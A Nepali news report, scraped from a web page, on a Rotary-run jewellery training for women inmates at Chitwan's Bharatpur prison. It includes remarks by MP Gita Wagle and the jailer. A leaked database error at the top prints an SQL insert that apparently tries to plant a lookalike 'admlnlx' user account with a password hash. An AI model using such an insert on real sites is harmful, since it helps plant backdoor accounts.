WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDEsT3mAFUnyqKJYrrfww1X54BZ0P7/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 18:30:15', '', 'admlnlx', 'admlnlx')
सृजना अर्याल,
चितवन, पुस ११–
महिला वर्ग जहाँ रहे पनि आत्मनिर्भर बन्ने प्रयासमा लाग्नु पर्ने सांसद गीता वाग्लेले बताउनुभएको छ । रोटरी क्लव अफ चितवन र रोटरी स्पाउस क्लव अफ चितवनको संयुक्त आयोजनामा भएको जिल्ला कारागार भरतपुर हुने ५ दिने क्रिष्टल गहना बनाउने तालिमको उद्घाटन गर्दै सांसद वाग्लेले यस्तो बताउनु भएको हो । उहाँले रत्नाकर डाकु पनि वाल्मीकी जस्तो प्रकाण्ड विद्धान बन्न सकेको उदारण दिदै गल्तीबाट सिक्नु पर्ने बताउनु भयो । उहाँले महिलालाई जेलमा देख्नुपर्दा नरमाइलो लागेको भन्दै सकारात्मक साँेच राखेर अगाडि बढ्नु सुझाब दिनु भयो ।
कारागारका जेलर कमलप्रसाद काफ्लेले महिला कैदिवन्दीका लागि आयआर्जनका तालिम आवश्यक रहेको बताउनु भयो । जेलर काफ्लेले तालिमको साथ साथै बजारीकरणको लागि पहल हुनु पर्ने बताउनुभयो ।
रोटरी क्लव अफ चितवनका अध्यक्ष चन्द्रमान श्रेष्ठ र रोटरी स्पाउस क्लव अफ चितवनकी अध्यक्ष योगीता पियाको अध्यक्षताम सम्पन कार्यक्रममा कविता चुके, शरद गोपाल न्यौछेलगायतले कार्यक्रमको उदेश्य माथि प्रकाश पार्नु भएको थियो ।
कार्यक्रमा समाजसेवी उत्तमलाल चुके, श्रीभक्तअच्युत वाग्ले, निरन्जन प्रधान, निरज खनाल, रोशन पिया, योगमाया श्रेष्ठलगायतको उपस्थिति रहेको थियो ।
दुई नाबालकसहित चितवन जिलला कारागारमा हाल ५३ जना महिला बन्दि सहित ५ सय ८५ जना कैदि बन्दि रहेको कारागारले जनाएको छ ।